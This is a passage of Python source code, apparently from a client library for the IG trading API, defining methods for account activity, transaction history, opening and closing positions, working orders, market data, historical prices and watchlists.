response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["activities"])
if len(data) == 0:
columns = [
"actionStatus", "activity", "activityHistoryId", "channel", "currency", "date",
"dealId", "epic", "level", "limit", "marketName", "period", "result", "size",
"stop", "stopType", "time"
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_account_activity_by_date(self, from_date: datetime, to_date: datetime, session=None):
"""
Returns the account activity history for period between the specified dates
"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
if from_date is None or to_date is None:
raise IGException("Both from_date and to_date must be specified")
if from_date > to_date:
raise IGException("from_date must be before to_date")
params = {}
url_params = {
"fromDate": from_date.strftime('%d-%m-%Y'),
"toDate": to_date.strftime('%d-%m-%Y')
}
endpoint = "/history/activity/{fromDate}/{toDate}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if _HAS_PANDAS and self.return_dataframe:
data = pd.DataFrame(data["activities"])
if len(data) == 0:
columns = [
"actionStatus", "activity", "activityHistoryId", "channel", "currency", "date",
"dealId", "epic", "level", "limit", "marketName", "period", "result", "size",
"stop", "stopType", "time"
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_account_activity_v2(
self,
from_date: datetime = None,
to_date: datetime = None,
max_span_seconds: int = None,
page_size: int = 20,
session=None):
"""
Returns the account activity history (v2)
If the result set spans multiple 'pages', this method will automatically get all the results and
bundle them into one object.
:param from_date: start date and time. Optional
:type from_date: datetime
:param to_date: end date and time. A date without time refers to the end of that day. Defaults to
today. Optional
:type to_date: datetime
:param max_span_seconds: Limits the timespan in seconds through to current time (not applicable if a
date range has been specified). Default 600. Optional
:type max_span_seconds: int
:param page_size: number of records per page. Default 20. Optional. Use 0 to turn off paging
:type page_size: int
:param session: session object. Optional
:type session: Session
:return: results set
:rtype: Pandas DataFrame if configured, otherwise a dict
"""
self.non_trading_rate_limit_pause_or_pass()
version = "2"
params = {}
if from_date:
params["from"] = from_date.strftime('%Y-%m-%dT%H:%M:%S')
if to_date:
params["to"] = to_date.strftime('%Y-%m-%dT%H:%M:%S')
if max_span_seconds:
params["maxSpanSeconds"] = max_span_seconds
params["pageSize"] = page_size
endpoint = "/history/activity/"
action = "read"
data = {}
activities = []
pagenumber = 1
more_results = True
while more_results:
params["pageNumber"] = pagenumber
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
activities.extend(data["activities"])
page_data = data["metadata"]["pageData"]
if page_data["totalPages"] == 0 or \
(page_data["pageNumber"] == page_data["totalPages"]):
more_results = False
else:
pagenumber += 1
data["activities"] = activities
if _HAS_PANDAS and self.return_dataframe:
data = pd.DataFrame(data["activities"])
return data
def fetch_account_activity(
self,
from_date: datetime = None,
to_date: datetime = None,
detailed=False,
deal_id: str = None,
fiql_filter: str = None,
page_size: int = 50,
session=None):
"""
Returns the account activity history (v3)
If the result set spans multiple 'pages', this method will automatically get all the results and
bundle them into one object.
:param from_date: start date and time. Optional
:type from_date: datetime
:param to_date: end date and time. A date without time refers to the end of that day. Defaults to
today. Optional
:type to_date: datetime
:param detailed: Indicates whether to retrieve additional details about the activity. Default False. Optional
:type detailed: bool
:param deal_id: deal ID. Optional
:type deal_id: str
:param fiql_filter: FIQL filter (supported operators: ==|!=|,|;). Optional
:type fiql_filter: str
:param page_size: page size (min: 10, max: 500). Default 50. Optional
:type page_size: int
:param session: session object. Optional
:type session: Session
:return: results set
:rtype: Pandas DataFrame if configured, otherwise a dict
"""
self.non_trading_rate_limit_pause_or_pass()
version = "3"
params = {}
if from_date:
params["from"] = from_date.strftime('%Y-%m-%dT%H:%M:%S')
if to_date:
params["to"] = to_date.strftime('%Y-%m-%dT%H:%M:%S')
if detailed:
params["detailed"] = "true"
if deal_id:
params["dealId"] = deal_id
if fiql_filter:
params["filter"] = fiql_filter
params["pageSize"] = page_size
endpoint = "/history/activity/"
action = "read"
data = {}
activities = []
more_results = True
while more_results:
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
activities.extend(data["activities"])
paging = data["metadata"]["paging"]
if paging["next"] is None:
more_results = False
else:
parse_result = urlparse(paging["next"])
query = parse_qs(parse_result.query)
logging.debug(f"fetch_account_activity() next query: '{query}'")
if 'from' in query:
params["from"] = query["from"][0]
else:
del params["from"]
if 'to' in query:
params["to"] = query["to"][0]
else:
del params["to"]
data["activities"] = activities
if _HAS_PANDAS and self.return_dataframe:
if detailed:
data = self.format_activities(data)
else:
data = pd.DataFrame(data["activities"])
return data
@staticmethod
def format_activities(data):
data = pd.json_normalize(data["activities"],
record_path=['details', ['actions']],
meta=['date', 'epic', 'period', 'dealId', 'channel', 'type', 'status', 'description',
['details', 'marketName'],
['details', 'goodTillDate'],
['details', 'currency'],
['details', 'direction'],
['details', 'level'],
['details', 'stopLevel'],
['details', 'stopDistance'],
['details', 'guaranteedStop'],
['details', 'trailingStopDistance'],
['details', 'trailingStep'],
['details', 'limitLevel'],
['details', 'limitDistance']],
)
data = data.rename(columns={'details.marketName': 'marketName',
'details.goodTillDate': 'goodTillDate',
'details.currency': 'currency',
'details.direction': 'direction',
'details.level': 'level',
'details.stopLevel': 'stopLevel',
'details.stopDistance': 'stopDistance',
'details.guaranteedStop': 'guaranteedStop',
'details.trailingStopDistance': 'trailingStopDistance',
'details.trailingStep': 'trailingStep',
'details.limitLevel': 'limitLevel',
'details.limitDistance': 'limitDistance'})
cols = data.columns.tolist()
cols = cols[2:] + cols[:2]
data = data[cols]
return data
def fetch_transaction_history_by_type_and_period(
self, milliseconds, trans_type, session=None
):
"""Returns the transaction history for the specified transaction
type and period"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
milliseconds = conv_to_ms(milliseconds)
params = {}
url_params = {"milliseconds": milliseconds, "trans_type": trans_type}
endpoint = "/history/transactions/{trans_type}/{milliseconds}".format(
**url_params
)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["transactions"])
if len(data) == 0:
columns = [
"cashTransaction",
"closeLevel",
"currency",
"date",
"instrumentName",
"openLevel",
"period",
"profitAndLoss",
"reference",
"size",
"transactionType",
]
data = pd.DataFrame(columns=columns)
return data
return data
def fetch_transaction_history(
self,
trans_type=None,
from_date=None,
to_date=None,
max_span_seconds=None,
page_size=None,
page_number=None,
session=None,
):
"""Returns the transaction history for the specified transaction
type and period"""
self.non_trading_rate_limit_pause_or_pass()
version = "2"
params = {}
if trans_type:
params["type"] = trans_type
if from_date:
if hasattr(from_date, "isoformat"):
from_date = from_date.isoformat()
params["from"] = from_date
if to_date:
if hasattr(to_date, "isoformat"):
to_date = to_date.isoformat()
params["to"] = to_date
if max_span_seconds:
params["maxSpanSeconds"] = max_span_seconds
if page_size:
params["pageSize"] = page_size
if page_number:
params["pageNumber"] = page_number
endpoint = "/history/transactions"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["transactions"])
if len(data) == 0:
columns = [
"cashTransaction",
"closeLevel",
"currency",
"date",
"dateUtc",
"instrumentName",
"openLevel",
"period",
"profitAndLoss",
"reference",
"size",
"transactionType",
]
data = pd.DataFrame(columns=columns)
return data
return data
# -------- END -------- #
# -------- DEALING -------- #
def fetch_deal_by_deal_reference(self, deal_reference, session=None):
"""Returns a deal confirmation for the given deal reference"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"deal_reference": deal_reference}
endpoint = "/confirms/{deal_reference}".format(**url_params)
action = "read"
for i in range(5):
response = self._req(action, endpoint, params, session, version)
if response.status_code == 404:
logger.info("Deal reference %s not found, retrying." % deal_reference)
time.sleep(1)
else:
break
data = self.parse_response(response.text)
return data
def fetch_open_position_by_deal_id(self, deal_id, session=None):
"""Return the open position by deal id for the active account"""
self.non_trading_rate_limit_pause_or_pass()
version = "2"
params = {}
url_params = {"deal_id": deal_id}
endpoint = "/positions/{deal_id}".format(**url_params)
action = "read"
for i in range(5):
response = self._req(action, endpoint, params, session, version)
if response.status_code == 404:
logger.info("Deal id %s not found, retrying." % deal_id)
time.sleep(1)
else:
break
data = self.parse_response(response.text)
return data
def fetch_open_positions(self, session=None, version='2'):
"""
Returns all open positions for the active account. Supports both v1 and v2
:param session: session object, otional
:type session: Session
:param version: API version, 1 or 2
:type version: str
:return: table of position data, one per row
:rtype: pd.Dataframe
"""
self.non_trading_rate_limit_pause_or_pass()
params = {}
endpoint = "/positions"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
list = data["positions"]
data = pd.DataFrame(list)
cols = {
"position": [
"contractSize", "createdDate", "createdDateUTC", "dealId", "dealReference", "size", "direction",
"limitLevel", "level", "currency", "controlledRisk", "stopLevel", "trailingStep",
"trailingStopDistance", "limitedRiskPremium"
],
"market": [
"instrumentName", "expiry", "epic", "instrumentType", "lotSize", "high", "low",
"percentageChange", "netChange", "bid", "offer", "updateTime", "updateTimeUTC",
"delayTime", "streamingPricesAvailable", "marketStatus", "scalingFactor"
]
}
if version == '1':
cols['position'].remove('createdDateUTC')
cols['position'].remove('dealReference')
cols['position'].remove('size')
cols['position'].insert(3, 'dealSize')
cols['position'].remove('level')
cols['position'].insert(6, 'openLevel')
cols['market'].remove('updateTimeUTC')
if len(data) == 0:
data = pd.DataFrame(columns=self.colname_unique(cols))
return data
data = self.expand_columns(data, cols)
return data
def close_open_position(
self,
deal_id,
direction,
epic,
expiry,
level,
order_type,
quote_id,
size,
session=None,
):
"""Closes one or more OTC positions"""
self.trading_rate_limit_pause_or_pass()
version = "1"
params = {
"dealId": deal_id,
"direction": direction,
"epic": epic,
"expiry": expiry,
"level": level,
"orderType": order_type,
"quoteId": quote_id,
"size": size,
}
endpoint = "/positions/otc"
action = "delete"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def create_open_position(
self,
currency_code,
direction,
epic,
expiry,
force_open,
guaranteed_stop,
level,
limit_distance,
limit_level,
order_type,
quote_id,
size,
stop_distance,
stop_level,
trailing_stop,
trailing_stop_increment,
session=None,
):
"""Creates an OTC position"""
self.trading_rate_limit_pause_or_pass()
version = "2"
params = {
"currencyCode": currency_code,
"direction": direction,
"epic": epic,
"expiry": expiry,
"forceOpen": force_open,
"guaranteedStop": guaranteed_stop,
"level": level,
"limitDistance": limit_distance,
"limitLevel": limit_level,
"orderType": order_type,
"quoteId": quote_id,
"size": size,
"stopDistance": stop_distance,
"stopLevel": stop_level,
"trailingStop": trailing_stop,
"trailingStopIncrement": trailing_stop_increment,
}
endpoint = "/positions/otc"
action = "create"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def update_open_position(
self,
limit_level,
stop_level,
deal_id,
guaranteed_stop=False,
trailing_stop=False,
trailing_stop_distance=None,
trailing_stop_increment=None,
session=None,
version='2'):
"""Updates an OTC position"""
self.trading_rate_limit_pause_or_pass()
params = {}
if limit_level is not None:
params["limitLevel"] = limit_level
if stop_level is not None:
params["stopLevel"] = stop_level
if guaranteed_stop:
params["guaranteedStop"] = 'true'
if trailing_stop:
params["trailingStop"] = 'true'
if trailing_stop_distance is not None:
params["trailingStopDistance"] = trailing_stop_distance
if trailing_stop_increment is not None:
params["trailingStopIncrement"] = trailing_stop_increment
url_params = {"deal_id": deal_id}
endpoint = "/positions/otc/{deal_id}".format(**url_params)
action = "update"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def fetch_working_orders(self, session=None, version='2'):
"""Returns all open working orders for the active account"""
self.non_trading_rate_limit_pause_or_pass() # ?? maybe considered trading request
params = {}
endpoint = "/workingorders"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
lst = data["workingOrders"]
data = pd.DataFrame(lst)
col_names_v1 = [u"size", u"trailingStopDistance", u"direction", u"level", u"requestType", u"currencyCode",
u"contingentLimit", u"trailingTriggerIncrement", u"dealId", u"contingentStop", u"goodTill",
u"controlledRisk", u"trailingStopIncrement", u"createdDate", u"epic",
u"trailingTriggerDistance", u"dma"]
col_names_v2 = [u"createdDate", u"currencyCode", u"dealId", u"direction", u"dma", u"epic",
u"goodTillDate", u"goodTillDateISO", u"guaranteedStop", u"limitDistance",
u"orderLevel", u"orderSize", u"orderType", u"stopDistance", u"timeInForce"]
d_cols = {
"marketData": [
u"instrumentName",
u"exchangeId",
u"streamingPricesAvailable",
u"offer",
u"low",
u"bid",
u"updateTime",
u"expiry",
u"high",
u"marketStatus",
u"delayTime",
u"lotSize",
u"percentageChange",
u"epic",
u"netChange",
u"instrumentType",
u"scalingFactor",
]
}
if version == '1':
d_cols["workingOrderData"] = col_names_v1
else:
d_cols["workingOrderData"] = col_names_v2
if len(data) == 0:
data = pd.DataFrame(columns=self.colname_unique(d_cols))
return data
col_overlap_allowed = ["epic"]
data = self.expand_columns(data, d_cols, False, col_overlap_allowed)
# d = data.to_dict()
# data = pd.concat(list(map(pd.DataFrame, d.values())),
# keys=list(d.keys())).T
return data
def create_working_order(
self,
currency_code,
direction,
epic,
expiry,
guaranteed_stop,
level,
size,
time_in_force,
order_type,
limit_distance=None,
limit_level=None,
stop_distance=None,
stop_level=None,
good_till_date=None,
deal_reference=None,
force_open=False,
session=None,
):
"""Creates an OTC working order"""
self.trading_rate_limit_pause_or_pass()
version = "2"
if good_till_date is not None and type(good_till_date) is not int:
good_till_date = conv_datetime(good_till_date, version)
params = {
"currencyCode": currency_code,
"direction": direction,
"epic": epic,
"expiry": expiry,
"guaranteedStop": guaranteed_stop,
"level": level,
"size": size,
"timeInForce": time_in_force,
"type": order_type,
}
if limit_distance:
params["limitDistance"] = limit_distance
if limit_level:
params["limitLevel"] = limit_level
if stop_distance:
params["stopDistance"] = stop_distance
if stop_level:
params["stopLevel"] = stop_level
if deal_reference:
params["dealReference"] = deal_reference
if force_open:
params["force_open"] = 'true'
if good_till_date:
params["goodTillDate"] = good_till_date
endpoint = "/workingorders/otc"
action = "create"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def delete_working_order(self, deal_id, session=None):
"""Deletes an OTC working order"""
self.trading_rate_limit_pause_or_pass()
version = "2"
params = {}
url_params = {"deal_id": deal_id}
endpoint = "/workingorders/otc/{deal_id}".format(**url_params)
action = "delete"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
def update_working_order(
self,
good_till_date,
level,
limit_distance,
limit_level,
stop_distance,
stop_level,
guaranteed_stop,
time_in_force,
order_type,
deal_id,
session=None,
):
"""Updates an OTC working order"""
self.trading_rate_limit_pause_or_pass()
version = "2"
if good_till_date is not None and type(good_till_date) is not int:
good_till_date = conv_datetime(good_till_date, version)
params = {
"goodTillDate": good_till_date,
"limitDistance": limit_distance,
"level": level,
"limitLevel": limit_level,
"stopDistance": stop_distance,
"stopLevel": stop_level,
"guaranteedStop": guaranteed_stop,
"timeInForce": time_in_force,
"type": order_type,
}
url_params = {"deal_id": deal_id}
endpoint = "/workingorders/otc/{deal_id}".format(**url_params)
action = "update"
response = self._req(action, endpoint, params, session, version)
if response.status_code == 200:
deal_reference = json.loads(response.text)["dealReference"]
return self.fetch_deal_by_deal_reference(deal_reference)
else:
raise IGException(response.text)
# -------- END -------- #
# -------- MARKETS -------- #
def fetch_client_sentiment_by_instrument(self, market_id, session=None):
"""Returns the client sentiment for the given instrument's market"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
if isinstance(market_id, (list,)):
market_ids = ",".join(market_id)
url_params = {"market_ids": market_ids}
endpoint = "/clientsentiment/?marketIds={market_ids}".format(**url_params)
else:
url_params = {"market_id": market_id}
endpoint = "/clientsentiment/{market_id}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_munch:
data = munchify(data)
return data
def fetch_related_client_sentiment_by_instrument(self, market_id, session=None):
"""Returns a list of related (also traded) client sentiment for
the given instrument's market"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"market_id": market_id}
endpoint = "/clientsentiment/related/{market_id}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["clientSentiments"])
return data
def fetch_top_level_navigation_nodes(self, session=None):
"""Returns all top-level nodes (market categories) in the market
navigation hierarchy."""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/marketnavigation"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data["markets"] = pd.DataFrame(data["markets"])
if len(data["markets"]) == 0:
columns = [
"bid",
"delayTime",
"epic",
"expiry",
"high",
"instrumentName",
"instrumentType",
"lotSize",
"low",
"marketStatus",
"netChange",
"offer",
"otcTradeable",
"percentageChange",
"scalingFactor",
"streamingPricesAvailable",
"updateTime",
]
data["markets"] = pd.DataFrame(columns=columns)
data["nodes"] = pd.DataFrame(data["nodes"])
if len(data["nodes"]) == 0:
columns = ["id", "name"]
data["nodes"] = pd.DataFrame(columns=columns)
# if self.return_munch:
# # ToFix: ValueError: The truth value of a DataFrame is ambiguous.
# # Use a.empty, a.bool(), a.item(), a.any() or a.all().
# from .utils import munchify
# data = munchify(data)
return data
def fetch_sub_nodes_by_node(self, node, session=None):
"""Returns all sub-nodes of the given node in the market
navigation hierarchy"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"node": node}
endpoint = "/marketnavigation/{node}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data["markets"] = pd.DataFrame(data["markets"])
data["nodes"] = pd.DataFrame(data["nodes"])
return data
def fetch_market_by_epic(self, epic, session=None):
"""Returns the details of the given market"""
self.non_trading_rate_limit_pause_or_pass()
version = "3"
params = {}
url_params = {"epic": epic}
endpoint = "/markets/{epic}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_munch:
data = munchify(data)
return data
def fetch_markets_by_epics(self, epics, detailed=True, session=None, version='2'):
"""
Returns the details of the given markets
:param epics: comma separated list of epics
:type epics: str
:param detailed: Whether to return detailed info or snapshot data only. Only supported for
version 2. Optional, default True
:type detailed: bool
:param session: session object. Optional, default None
:type session: requests.Session
:param version: IG API method version. Optional, default '2'
:type version: str
:return: list of market details
:rtype: Munch instance if configured, else dict
"""
self.non_trading_rate_limit_pause_or_pass()
params = {"epics": epics}
if version == '2':
params["filter"] = 'ALL' if detailed else 'SNAPSHOT_ONLY'
endpoint = "/markets"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_munch:
data = munchify(data['marketDetails'])
else:
data = data['marketDetails']
return data
def search_markets(self, search_term, session=None):
"""Returns all markets matching the search term"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
endpoint = "/markets"
params = {"searchTerm": search_term}
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["markets"])
return data
def format_prices(self, prices, version, flag_calc_spread=False):
"""Format prices data as a DataFrame with hierarchical columns"""
if len(prices) == 0:
raise (Exception("Historical price data not found"))
def cols(typ):
return {
"openPrice.%s" % typ: "Open",
"highPrice.%s" % typ: "High",
"lowPrice.%s" % typ: "Low",
"closePrice.%s" % typ: "Close",
"lastTradedVolume": "Volume",
}
last = prices[0]["lastTradedVolume"] or prices[0]["closePrice"]["lastTraded"]
df = json_normalize(prices)
df = df.set_index("snapshotTime")
df.index = pd.to_datetime(df.index, format=DATE_FORMATS[int(version)])
df.index.name = "DateTime"
df_ask = df[
["openPrice.ask", "highPrice.ask", "lowPrice.ask", "closePrice.ask"]
]
df_ask = df_ask.rename(columns=cols("ask"))
df_bid = df[
["openPrice.bid", "highPrice.bid", "lowPrice.bid", "closePrice.bid"]
]
df_bid = df_bid.rename(columns=cols("bid"))
if flag_calc_spread:
df_spread = df_ask - df_bid
if last:
df_last = df[
[
"openPrice.lastTraded",
"highPrice.lastTraded",
"lowPrice.lastTraded",
"closePrice.lastTraded",
"lastTradedVolume",
]
]
df_last = df_last.rename(columns=cols("lastTraded"))
data = [df_bid, df_ask]
keys = ["bid", "ask"]
if flag_calc_spread:
data.append(df_spread)
keys.append("spread")
if last:
data.append(df_last)
keys.append("last")
df2 = pd.concat(data, axis=1, keys=keys)
return df2
def flat_prices(self, prices, version):
"""Format price data as a flat DataFrame, no hierarchy"""
if len(prices) == 0:
raise (Exception("Historical price data not found"))
df = json_normalize(prices)
df = df.set_index("snapshotTimeUTC")
df.index = pd.to_datetime(df.index, format="%Y-%m-%dT%H:%M:%S")
df.index.name = "DateTime"
df = df.drop(columns=['snapshotTime',
'openPrice.lastTraded',
'closePrice.lastTraded',
'highPrice.lastTraded',
'lowPrice.lastTraded'])
df = df.rename(columns={"openPrice.bid": "open.bid",
"openPrice.ask": "open.ask",
"closePrice.bid": "close.bid",
"closePrice.ask": "close.ask",
"highPrice.bid": "high.bid",
"highPrice.ask": "high.ask",
"lowPrice.bid": "low.bid",
"lowPrice.ask": "low.ask",
"lastTradedVolume": "volume"})
return df
def mid_prices(self, prices, version):
"""Format price data as a flat DataFrame, no hierarchy, calculating mid prices"""
if len(prices) == 0:
raise (Exception("Historical price data not found"))
df = json_normalize(prices)
df = df.set_index("snapshotTimeUTC")
df.index = pd.to_datetime(df.index, format="%Y-%m-%dT%H:%M:%S")
df.index.name = "DateTime"
df['Open'] = df[['openPrice.bid', 'openPrice.ask']].mean(axis=1)
df['High'] = df[['highPrice.bid', 'highPrice.ask']].mean(axis=1)
df['Low'] = df[['lowPrice.bid', 'lowPrice.ask']].mean(axis=1)
df['Close'] = df[['closePrice.bid', 'closePrice.ask']].mean(axis=1)
df = df.drop(columns=['snapshotTime', 'openPrice.lastTraded', 'closePrice.lastTraded',
'highPrice.lastTraded', 'lowPrice.lastTraded',
"openPrice.bid", "openPrice.ask",
"closePrice.bid", "closePrice.ask",
"highPrice.bid", "highPrice.ask",
"lowPrice.bid", "lowPrice.ask"])
df = df.rename(columns={"lastTradedVolume": "Volume"})
return df
def fetch_historical_prices_by_epic(
self,
epic,
resolution=None,
start_date=None,
end_date=None,
numpoints=None,
pagesize=20,
session=None,
format=None,
wait=1
):
"""
Fetches historical prices for the given epic.
This method wraps the IG v3 /prices/{epic} endpoint. With this method you can
choose to get either a fixed number of prices in the past, or to get the
prices between two points in time. By default it will return the last 10
prices at 1 minute resolution.
If the result set spans multiple 'pages', this method will automatically
get all the results and bundle them into one object.
:param epic: (str) The epic key for which historical prices are being
requested
:param resolution: (str, optional) timescale resolution. Expected values
are 1Min, 2Min, 3Min, 5Min, 10Min, 15Min, 30Min, 1H, 2H, 3H, 4H, D,
W, M. Default is 1Min
:param start_date: (datetime, optional) date range start, format
yyyy-MM-dd'T'HH:mm:ss
:param end_date: (datetime, optional) date range end, format
yyyy-MM-dd'T'HH:mm:ss
:param numpoints: (int, optional) number of data points. Default is 10
:param pagesize: (int, optional) number of data points. Default is 20
:param session: (Session, optional) session object
:param format: (function, optional) function to convert the raw
JSON response
:param wait: (int, optional) how many seconds to wait between successive
calls in a multi-page scenario. Default is 1
:returns: Pandas DataFrame if configured, otherwise a dict
:raises Exception: raises an exception if any error is encountered
"""
version = "3"
params = {}
if resolution and self.return_dataframe:
params["resolution"] = conv_resol(resolution)
if start_date:
params["from"] = start_date
if end_date:
params["to"] = end_date
if numpoints:
params["max"] = numpoints
params["pageSize"] = pagesize
url_params = {"epic": epic}
endpoint = "/prices/{epic}".format(**url_params)
action = "read"
prices = []
pagenumber = 1
more_results = True
while more_results:
params["pageNumber"] = pagenumber
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
prices.extend(data["prices"])
page_data = data["metadata"]["pageData"]
if page_data["totalPages"] == 0 or \
(page_data["pageNumber"] == page_data["totalPages"]):
more_results = False
else:
pagenumber += 1
time.sleep(wait)
data["prices"] = prices
if format is None:
format = self.format_prices
if self.return_dataframe:
data["prices"] = format(data["prices"], version)
data['prices'] = data['prices'].fillna(value=np.nan)
self.log_allowance(data["metadata"])
return data
def fetch_historical_prices_by_epic_and_num_points(self, epic, resolution,
numpoints, session=None,
format=None):
"""Returns a list of historical prices for the given epic, resolution,
number of points"""
version = "2"
if self.return_dataframe:
resolution = conv_resol(resolution)
params = {}
url_params = {"epic": epic, "resolution": resolution, "numpoints": numpoints}
endpoint = "/prices/{epic}/{resolution}/{numpoints}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if format is None:
format = self.format_prices
if self.return_dataframe:
data["prices"] = format(data["prices"], version)
data['prices'] = data['prices'].fillna(value=np.nan)
return data
def fetch_historical_prices_by_epic_and_date_range(
self, epic, resolution, start_date, end_date, session=None, format=None, version='2'
):
"""
Returns a list of historical prices for the given epic, resolution, multiplier and date range. Supports
both versions 1 and 2
:param epic: IG epic
:type epic: str
:param resolution: timescale for returned data. Expected values 'M', 'D', '1H' etc
:type resolution: str
:param start_date: start date for returned data. For v1, format '2020:09:01-00:00:00', for v2 use
'2020-09-01 00:00:00'
:type start_date: str
:param end_date: end date for returned data. For v1, format '2020:09:01-00:00:00', for v2 use
'2020-09-01 00:00:00'
:type end_date: str
:param session: HTTP session
:type session: requests.Session
:param format: function defining how the historic price data should be converted into a Dataframe
:type format: function
:param version: API method version
:type version: str
:return: historic data
:rtype: dict, with 'prices' element as pandas.Dataframe
"""
if self.return_dataframe:
resolution = conv_resol(resolution)
params = {}
if version == '1':
start_date = conv_datetime(start_date, version)
end_date = conv_datetime(end_date, version)
params = {"startdate": start_date, "enddate": end_date}
url_params = {"epic": epic, "resolution": resolution}
endpoint = "/prices/{epic}/{resolution}".format(**url_params)
else:
url_params = {"epic": epic, "resolution": resolution, "startDate": start_date, "endDate": end_date}
endpoint = "/prices/{epic}/{resolution}/{startDate}/{endDate}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
del self.session.headers["VERSION"]
data = self.parse_response(response.text)
if format is None:
format = self.format_prices
if self.return_dataframe:
data["prices"] = format(data["prices"], version)
data['prices'] = data['prices'].fillna(value=np.nan)
return data
def log_allowance(self, data):
remaining_allowance = data['allowance']['remainingAllowance']
allowance_expiry_secs = data['allowance']['allowanceExpiry']
allowance_expiry = datetime.today() + timedelta(seconds=allowance_expiry_secs)
logger.info("Historic price data allowance: %s remaining until %s" %
(remaining_allowance, allowance_expiry))
# -------- END -------- #
# -------- WATCHLISTS -------- #
def fetch_all_watchlists(self, session=None):
"""Returns all watchlists belonging to the active account"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/watchlists"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["watchlists"])
return data
def create_watchlist(self, name, epics, session=None):
"""Creates a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {"name": name, "epics": epics}
endpoint = "/watchlists"
action = "create"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def delete_watchlist(self, watchlist_id, session=None):
"""Deletes a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"watchlist_id": watchlist_id}
endpoint = "/watchlists/{watchlist_id}".format(**url_params)
action = "delete"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def fetch_watchlist_markets(self, watchlist_id, session=None):
"""Returns the given watchlist's markets"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"watchlist_id": watchlist_id}
endpoint = "/watchlists/{watchlist_id}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["markets"])
return data
def add_market_to_watchlist(self, watchlist_id, epic, session=None):
"""Adds a market to a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {"epic": epic}
url_params = {"watchlist_id": watchlist_id}
endpoint = "/watchlists/{watchlist_id}".format(**url_params)
action = "update"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def remove_market_from_watchlist(self, watchlist_id, epic, session=None):
"""Remove a market from a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"watchlist_id": watchlist_id, "epic": epic}
endpoint = "/watchlists/{watchlist_id}/{epic}".format(**url_params)
action = "delete"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
# -------- END -------- #
# -------- LOGIN -------- #
def logout(self, session=None):
"""Log out of the current session"""
version = "1"
params = {}
endpoint = "/session"
action = "delete"
self._req(action, endpoint, params, session, version)
self.session.close()
self._exit_bucket_threads()
def get_encryption_key(self, session=None):
"""Get encryption key to encrypt the password"""
endpoint = "/session/encryptionKey"
session = self._get_session(session)
response = session.get(self.BASE_URL + endpoint)
if not response.ok:
raise IGException("Could not get encryption key for login.")
data = response.json()
return data["encryptionKey"], data["timeStamp"]
def encrypted_password(self, session=None):
